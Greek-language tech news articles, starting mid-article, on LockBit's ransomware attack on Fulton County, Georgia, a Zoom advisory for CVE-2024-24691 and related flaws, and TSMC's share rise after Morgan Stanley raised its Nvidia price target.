Ο πρόεδρος της κομητείας Fulton, Robb Pitt, είχε πει στις 29 Ιανουαρίου ότι δεν υπήρχαν ενδείξεις για κλοπή ευαίσθητων πληροφοριών πολιτών ή υπάλληλων, αλλά η έρευνα βρισκόταν ακόμα σε πρώιμο στάδιο.

Σε μια νέα συνέντευξη Τύπου, που υποκινήθηκε από την ανάρτηση της ransomware ομάδας LockBit για την επίθεση στην κομητεία Fulton, ο Pitt επιβεβαίωσε την επίθεση ransomware.

Η επίθεση επηρέασε τις τηλεφωνικές γραμμές, με το ένα τρίτο των τηλεφώνων να έχει πλέον αποκατασταθεί. Μέρος των φορολογικών συστημάτων δεν είναι ακόμα online και η επεξεργασία πληρωμών μαζί με άλλες συναλλαγές δεν είναι δυνατή αυτήν τη στιγμή.

Επιπλέον, οι πολίτες συνεχίζουν να αντιμετωπίζουν προβλήματα με τη χρέωση του νερού καθώς δεν γίνονται δεκτές ηλεκτρονικές πληρωμές. Ωστόσο, οι κάτοικοι δεν θα υποστούν κυρώσεις για καθυστερήσεις.

Ο Pitt είπε επίσης ότι καθυστερήσεις υπάρχουν και σε ορισμένες υπηρεσίες στο δικαστικό σύστημα.

Δείτε επίσης: Capital Health: Θύμα επίθεσης του LockBit ransomware

Την Τρίτη, η ομάδα ransomware LockBit ανέλαβε την ευθύνη για την επίθεση στην κομητεία Fulton και δημοσίευσε 25 screenshots για να αποδείξει την παραβίαση στα συστήματα και την κλοπή δεδομένων.

Όπως προείπαμε, οι hackers LockBit ισχυρίζονται ότι έχουν κλέψει δεδομένα που περιέχουν προσωπικά δεδομένα πολιτών.

Τα έγγραφα που έχουν επισημανθεί ως εμπιστευτικά θα είναι διαθέσιμα στο κοινό. Θα δείξουμε έγγραφα που σχετίζονται με την πρόσβαση στα προσωπικά δεδομένα των πολιτών της πολιτείας“, αναφέρει η ομάδα στην ανάρτησή της στον ιστότοπό της.

Σκοπεύουμε να δώσουμε τη μέγιστη δημοσιότητα σε αυτήν την υπόθεση“, πρόσθεσε.

Οι hackers έχουν δώσει προθεσμία έως τις 16 Φεβρουαρίου. Αν δεν λάβουν τα λύτρα μέχρι τότε, θα αρχίσουν να διαρρέουν τα κλεμμένα δεδομένα.

Ωστόσο, η διοίκηση της κομητείας Fulton φαίνεται ότι προσπαθεί να αποκαταστήσει τα συστήματά της με χρήματα από την ασφάλεια, οπότε πιθανότατα δεν σκέφτεται να πληρώσει τους hackers.

Fulton County, Georgia

LockBit ransomware

Η ομάδα LockBit είναι μια hacking ομάδα που ξεκίνησε τις δραστηριότητές της περίπου το 2020. Έχει γίνει ιδιαίτερα δημοφιλής λόγω της ταχύτητας και αυτοματοποίησης των επιθέσεών της. Η ομάδα χρησιμοποιεί τεχνικές όπως το spear phishing και την εκμετάλλευση ευπαθειών για να εισχωρήσει στα συστήματα των θυμάτων της.

Δείτε επίσης: Lockbit ransomware: Διακόπτει τη λειτουργία σε γερμανικά νοσοκομεία

Η συμμορία έχει στοχεύσει μια σειρά από βιομηχανίες, συμπεριλαμβανομένων των τομέων της υγείας, της εκπαίδευσης και της κυβέρνησης. Ένα από τα πιο σημαντικά περιστατικά ήταν η επίθεση στην εταιρεία λογισμικού Accenture το 2021, όπου η ομάδα ισχυρίστηκε ότι είχε κλέψει μια τεράστια ποσότητα δεδομένων.

Η LockBit Ransomware Gang είναι επίσης γνωστή για την τακτική του ‘double extortion‘. Αυτό σημαίνει ότι, εκτός από την κρυπτογράφηση των δεδομένων του θύματος, η ομάδα απειλεί επίσης να δημοσιεύσει δεδομένα που έχει κλέψει, εάν το θύμα δεν πληρώσει τα λύτρα.

Παρά τις προσπάθειες των αρχών για την καταπολέμηση της κυβερνοεγκληματικότητας, η Ransomware συμμορία LockBit συνεχίζει να είναι ενεργή και να απειλεί οργανισμούς σε όλο τον κόσμο.

Πηγή: www.bleepingcomputer.com

Zoom: Προειδοποιεί για κρίσιμη ευπάθεια – Κάντε άμεσα update!

Η Zoom Video Communications προειδοποιεί ότι οι Zoom desktop και VDI clients και το Meeting SDK για Windows είναι ευάλωτοι σε μια ευπάθεια που θα μπορούσε να επιτρέψει σε έναν μη εξουσιοδοτημένο εισβολέα να αποκτήσει περισσότερα προνόμια (privilege escalation) στο σύστημα.

zoom ευπάθεια ενημέρωση

Το Zoom έγινε μια από τις πιο δημοφιλείς υπηρεσίες τηλεδιάσκεψης κατά τη διάρκεια της πανδημίας. Βασίζεται στο cloud και χρησιμοποιείται από χρήστες σε όλο τον κόσμο για εταιρικές συναντήσεις, εκπαιδευτικά μαθήματα, κοινωνικές αλληλεπιδράσεις και πολλά άλλα. Προσφέρει διάφορες δυνατότητες που επιτρέπουν την αποτελεσματική ψηφιακή επικοινωνία και συνεργασία.

Η ευπάθεια που αποκαλύφθηκε πρόσφατα από την εταιρεία, παρακολουθείται ως CVE-2024-24691 και ανακαλύφθηκε από την ομάδα ασφαλείας της ίδιας της Zoom. Θεωρείται “κρίσιμη” με βαθμολογία 9,6/10 στην κλίμακα CVSS v3.1.

Δείτε επίσης: Microsoft Patch Tuesday Φεβρουαρίου 2024: Διορθώνονται 73 ευπάθειες

Η ευπάθεια επηρεάζει τις ακόλουθες εκδόσεις προϊόντων:

  • Zoom Desktop Client για Windows πριν από την έκδοση 5.16.5
  • Zoom VDI Client για Windows πριν από την έκδοση 5.16.10 (εξαιρουμένων των 5.14.14 και 5.15.12)
  • Zoom Rooms Client για Windows πριν από την έκδοση 5.17.0
  • Zoom Meeting SDK για Windows πριν από την έκδοση 5.16.5

Η Zoom δεν έδωσε λεπτομέρειες σχετικά με τον τρόπο εκμετάλλευσης της ευπάθειας ή τις επιπτώσεις, αλλά φαίνεται ότι απαιτείται κάποια αλληλεπίδραση με τον χρήστη. Αυτό θα μπορούσε να περιλαμβάνει το κλικ σε έναν σύνδεσμο, το άνοιγμα ενός συνημμένου αρχείου ή την εκτέλεση κάποιας άλλης ενέργειας που θα μπορούσε να αξιοποιήσει ο εισβολέας για να εκμεταλλευτεί την ευπάθεια CVE-2024-24691.

Το Zoom εμφανίζει μια αυτόματη ειδοποίηση στους χρήστες για ενημέρωση του λογισμικού στην πιο πρόσφατη έκδοση. Ωστόσο, μπορεί κάποιος να πραγματοποιήσει λήψη και εγκατάσταση της πιο πρόσφατης έκδοσης του desktop client για Windows, έκδοση 5.17.7, manually.

Αξίζει να σημειωθεί ότι η άμεση εφαρμογή της ενημέρωσης είναι απαραίτητη γιατί πέρα από την παραπάνω κρίσιμη ευπάθεια, διορθώνονται και άλλες έξι ευπάθειες.

Δείτε επίσης: CISA: Προσθέτει ευπάθεια του Chrome στον Κατάλογο KEV

  • CVE-2024-24697: Μια πολύ σοβαρή ευπάθεια σε Zoom 32-bit Windows clients επιτρέπει την κλιμάκωση των προνομίων μέσω τοπικής πρόσβασης.
  • CVE-2024-24696: Πρόκειται για ένα in-meeting chat ζήτημα σε Zoom Windows clients, που προκαλείται από μη κατάλληλο input validation και επιτρέπει την αποκάλυψη πληροφοριών μέσω του δικτύου.
  • CVE-2024-24695: Παρόμοια με το CVE-2024-24696, το μη κατάλληλο input validation σε Zoom Windows clients, επιτρέπει την αποκάλυψη πληροφοριών μέσω του δικτύου.
  • CVE-2024-24699: Ένα business logic error στο in-meeting chat feature που μπορεί να οδηγήσει σε αποκάλυψη πληροφοριών μέσω του δικτύου.
  • CVE-2024-24690: Η ευπάθεια εντοπίζεται σε ορισμένα Zoom clients και προκαλείται από μη κατάλληλο input validation. Μπορεί να προκαλέσει denial of service μέσω του δικτύου.
  • CVE-2024-24698: Μια ευπάθεια που επιτρέπει την αποκάλυψη πληροφοριών μέσω τοπικής πρόσβασης από privileged users.

Προστασία

Λαμβάνοντας υπόψη τις παραπάνω ευπάθειες, οι χρήστες του Zoom θα πρέπει να εφαρμόσουν την ενημέρωση ασφαλείας το συντομότερο δυνατό για να μειώσουν τις πιθανότητες κάποιας παραβίασης.

Δείτε επίσης: Νέες ευπάθειες σε Cisco, Fortinet, VMware απαιτούν άμεση ενημέρωση

Έπειτα, είναι χρήσιμο να έχετε εγκατεστημένο στη συσκευή ένα αξιόπιστο πρόγραμμα προστασίας από ιούς. Αυτό μπορεί να βοηθήσει στην ανίχνευση και την αποτροπή των επιθέσεων πριν προκαλέσουν ζημιά.

Τέλος, χρησιμοποιήστε ένα δίκτυο προστασίας firewall για να ελέγχετε το εισερχόμενο και εξερχόμενο traffic στο δίκτυό σας. Αυτό μπορεί να βοηθήσει στην αποτροπή των επιθέσεων πριν φτάσουν στο σύστημά σας

Πηγή: www.bleepingcomputer.com

TSMC: Αύξηση μετοχών μετά την άνοδο τιμής στόχου της Nvidia

Την Πέμπτη, οι μετοχές της Taiwan Semiconductor Manufacturing Company (TSMC) έφτασαν στο υψηλότερο επίπεδο όλων των εποχών.

TSMC NVIDIA

Αυτό συνέβη μετά την αύξηση του στόχου τιμής για την Nvidia, μια εταιρεία που σχεδιάζει chip, από τη Morgan Stanley. Η αύξηση αυτή σχετίζεται με τη συνεχή αύξηση της ζήτησης για την τεχνητή νοημοσύνη.

Δείτε επίσης: Η Apple θα είναι η πρώτη που θα έχει πρόσβαση στα τσιπ 2nm της TSMC

Η TSMC, η οποία είναι ο μεγαλύτερος παραγωγός προηγμένων επεξεργαστών στον κόσμο, κατασκευάζει chip για εταιρείες όπως η Nvidia και η Apple.

Η Morgan Stanley στις 7 Φεβρουαρίου αύξησε τον στόχο τιμής για τον αμερικανικό γίγαντα chip σε 750 $ από 603 $ που ήταν προηγουμένως, επισημαίνοντας μια ισχυρή βραχυπρόθεσμη προοπτική.

Οι μετοχές της TSMC αυξήθηκαν σήμερα το πρωί και έφθασαν τα 709 νέα δολάρια Ταϊβάν, κλείνοντας στα NT$697, που αντιστοιχούν σε σχεδόν 8% υψηλότερο επίπεδο από το τελευταίο κλείσιμο στις 5 Φεβρουαρίου. Το Χρηματιστήριο της Ταϊβάν επανήλθε στη λειτουργία του σήμερα, 15 Φεβρουαρίου, μετά το διάλειμμα για το κινεζικό νέο έτος.

Η Nvidia αποτελεί μία από τις πιο ωφελούμενες της έκρηξης στην τεχνητή νοημοσύνη που ξεκίνησε πέρυσι, με αυξημένο ενδιαφέρον για την παραγωγική τεχνητή νοημοσύνη μετά την κυκλοφορία του ChatGPT του OpenAI τον Νοέμβριο του 2022. Το ChatGPT έγινε viral για την ικανότητά του να παράγει ανθρώπινες απαντήσεις σε προτροπές από τους χρήστες.

Τα μοντέλα τεχνητής νοημοσύνης, όπως το ChatGPT απαιτούν εκτεταμένη χρήση γραφικών μονάδων επεξεργασίας για την εκπαίδευσή τους. Οι επεξεργαστές πρέπει να είναι αρκετά ισχυροί για να αντιμετωπίσουν γρήγορα τεραβάιτ δεδομένα και να αναγνωρίσουν μοτίβα. Το ChatGPT εκπαιδεύεται και λειτουργεί σε χιλιάδες κάρτες γραφικών της Nvidia.

Σύμφωνα με την έκθεση της 7ης Φεβρουαρίου από τους αναλυτές της Morgan Stanley, το B100 έχει μεγάλη σπουδαιότητα σαν βραχυπρόθεσμος μοχλός, που επηρεάζει τους χρόνους παράδοσης του H100 και την δυναμική του ανταγωνισμού.

Η επερχόμενη GPU B100 της Nvidia αναμένεται να επαναπροσδιορίσει τα παιχνίδια της τεχνητής νοημοσύνης, καθώς υπόσχεται ακόμη μεγαλύτερη ισχύ από τον επεξεργαστή H100 AI, σύμφωνα με τους αναλυτές.

TSMC NVIDIA

Διαβάστε περισσότερα: TSMC: Αντισταθμίζει τη μείωση ζήτησης για iPhone με AI chips

Η TSMC αυτή τη στιγμή αναπτύσσει chip 3 νανομέτρων και έχει σχέδια να ξεκινήσει τη μαζική παραγωγή chip 2 νανομέτρων το 2025.

Ο όρος “νανόμετρο” στην τεχνολογία των chip αναφέρεται στο μέγεθος των μεμονωμένων τρανζίστορ. Τα μικρότερα μεγέθη νανομέτρων συνήθως οδηγούν σε πιο ισχυρά και αποδοτικά chip, καθώς επιτρέπουν τη συσκευασία περισσότερων τρανζίστορ σε ένα μόνο chip.

Επίσης, οι μετοχές της Orient Semiconductor Electronics Ltd της Ταϊβάν αυξήθηκαν 10% την Πέμπτη.

Πηγή: cnbc.com